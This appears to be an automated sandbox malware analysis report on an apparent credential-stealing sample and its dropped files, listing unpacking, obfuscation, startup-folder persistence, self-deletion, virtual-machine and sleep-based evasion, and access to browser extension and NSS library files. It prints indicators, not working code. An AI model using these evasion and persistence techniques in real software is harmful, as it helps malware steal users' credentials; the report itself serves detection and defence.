Source: nss3[1].dll.27.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: A8D4.exe, 0000001B.00000002.506315129.0000000006760000.00000004.00000001.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: A8D4.exe, 0000001B.00000002.506315129.0000000006760000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: softokn3[1].dll.27.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: A8D4.exe, 0000001B.00000002.506315129.0000000006760000.00000004.00000001.sdmp, nss3[1].dll.27.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3[1].dll.27.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: A8D4.exe, 0000001B.00000002.506315129.0000000006760000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: nss3[1].dll.27.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: nss3[1].dll.27.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: softokn3[1].dll.27.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: nss3[1].dll.27.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.27.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3[1].dll.27.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.27.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: A8D4.exe, 0000001B.00000002.506315129.0000000006760000.00000004.00000001.sdmp, nss3[1].dll.27.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: A8D4.exe, 0000001B.00000002.506315129.0000000006760000.00000004.00000001.sdmp, nss3[1].dll.27.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: nss3[1].dll.27.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3[1].dll.27.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: softokn3[1].dll.27.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: nss3[1].dll.27.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:

Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Mutant created: \Sessions\1\BaseNamedObjects\{48D87B02-03F7-4188-8BE8-7733FF2CBCA6}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_01

Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: AhB0i1fe7I.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: +9\a3C:\vuwesatubezin wozejoyo.pdb source: AhB0i1fe7I.exe
Source:	Binary string: C:\bicuh\zobadeyajikodo\kukotibolufunu\hadisat.pdb`I source: 45C4.exe, 00000013.00000000.391115493.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 00000016.00000000.409632573.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 00000017.00000000.410357794.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 0000001A.00000000.435229767.000000000048F000.00000002.00020000.sdmp, SmartClock.exe.19.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.27.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140[1].dll.27.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140[1].dll.27.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.27.dr
Source:	Binary string: C:\vuwesatubezin wozejoyo.pdb source: AhB0i1fe7I.exe
Source:	Binary string: C:\bicuh\zobadeyajikodo\kukotibolufunu\hadisat.pdb source: 45C4.exe, 00000013.00000000.391115493.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 00000016.00000000.409632573.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 00000017.00000000.410357794.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 0000001A.00000000.435229767.000000000048F000.00000002.00020000.sdmp, SmartClock.exe.19.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.27.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Unpacked PE file: 19.2.45C4.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 22.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 23.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 26.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Unpacked PE file: 27.2.A8D4.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Unpacked PE file: 0.2.AhB0i1fe7I.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.jezuvak:R;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\jajvesg	Unpacked PE file: 14.2.jajvesg.400000.0.unpack .text:ER;.rdata:R;.data:W;.jezuvak:R;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Unpacked PE file: 19.2.45C4.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.paceho:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 22.2.SmartClock.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.paceho:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 23.2.SmartClock.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.paceho:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 26.2.SmartClock.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.paceho:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Unpacked PE file: 27.2.A8D4.exe.400000.0.unpack .text:ER;.data:R;.data:W;.rsrc:W;.fert:W; vs .text:ER;.rdata:R;.data:W;

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00402C1B push esi; iretd	0_2_00402C1C
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_0040E4FD push ds; iretd	0_2_0040E50E
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00416524 push eax; ret	0_2_00416542
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_02F11B6B push ebp; iretd	0_2_02F11B6D
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_02F12A54 push eax; ret	0_2_02F12A55
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_02F12A57 push ds; iretd	0_2_02F12A58
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_02F11D59 push ecx; retf	0_2_02F11D64
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_02F12749 push esi; iretd	0_2_02F1274A
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_02F12118 push eax; ret	0_2_02F12121
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00402C1B push esi; iretd	14_2_00402C1C
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00416524 push eax; ret	14_2_00416542
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_030A2C6B push esi; iretd	14_2_030A2C6C
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0041D1BC push eax; retn 0041h	19_2_0041D1E1
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0041CA40 pushad ; retn 0041h	19_2_0041CBB9
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0041BB1C pushad ; retn 0041h	19_2_0041BB45
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0040A446 push ecx; ret	19_2_0040A459
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_004075A2 push eax; mov dword ptr [esp], ecx	19_2_004075A7
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_04CE2510 push esi; ret	19_2_04CE2527
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0041D1BC push eax; retn 0041h	22_2_0041D1E1
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0041CA40 pushad ; retn 0041h	22_2_0041CBB9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0041BB1C pushad ; retn 0041h	22_2_0041BB45
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040A446 push ecx; ret	22_2_0040A459
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_004075A2 push eax; mov dword ptr [esp], ecx	22_2_004075A7
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_04C32510 push esi; ret	22_2_04C32527
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0041D1BC push eax; retn 0041h	23_2_0041D1E1
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0041CA40 pushad ; retn 0041h	23_2_0041CBB9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0041BB1C pushad ; retn 0041h	23_2_0041BB45
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0040A446 push ecx; ret	23_2_0040A459
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_004075A2 push eax; mov dword ptr [esp], ecx	23_2_004075A7
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_04CF2510 push esi; ret	23_2_04CF2527
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_0041D1BC push eax; retn 0041h	26_2_0041D1E1

PE file contains sections with non-standard names

Source: AhB0i1fe7I.exe	Static PE information: section name: .jezuvak
Source: 45C4.exe.3.dr	Static PE information: section name: .paceho
Source: A8D4.exe.3.dr	Static PE information: section name: .fert
Source: jajvesg.3.dr	Static PE information: section name: .jezuvak
Source: SmartClock.exe.19.dr	Static PE information: section name: .paceho
Source: mozglue.dll.27.dr	Static PE information: section name: .didat
Source: msvcp140.dll.27.dr	Static PE information: section name: .didat
Source: mozglue[1].dll.27.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.27.dr	Static PE information: section name: .didat

Source: initial sample	Static PE information: section name: .text entropy: 7.37520443918
Source: initial sample	Static PE information: section name: .text entropy: 7.97197872693
Source: initial sample	Static PE information: section name: .text entropy: 7.37520443918
Source: initial sample	Static PE information: section name: .text entropy: 7.97197872693

Persistence and Installation Behavior:

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\jajvesg

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\45C4.exe	File created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\jajvesg	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\Taxao[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\A8D4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\45C4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll	Jump to dropped file

Boot Survival:

Stores files to the Windows start menu directory

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\ahb0i1fe7i.exe

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\jajvesg:Zone.Identifier read attributes | delete

Creates files in alternative data streams (ADS)

Source: C:\Users\user\AppData\Local\Temp\A8D4.exe

File created: C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe:Zone.Identifier

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Delayed program exit found

Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_004011E2 Sleep,ExitProcess,	19_2_004011E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_004011E2 Sleep,ExitProcess,	22_2_004011E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_004011E2 Sleep,ExitProcess,	23_2_004011E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_004011E2 Sleep,ExitProcess,	26_2_004011E2

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 6156	Thread sleep time: -36700s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6152	Thread sleep time: -44900s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe TID: 664	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe

Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 580	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 367	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 449	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 418	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll	Jump to dropped file

Is looking for software installed on the system

Source: C:\Users\user\AppData\Local\Temp\A8D4.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior

Source: explorer.exe, 00000003.00000000.301650991.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000003.00000000.301650991.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
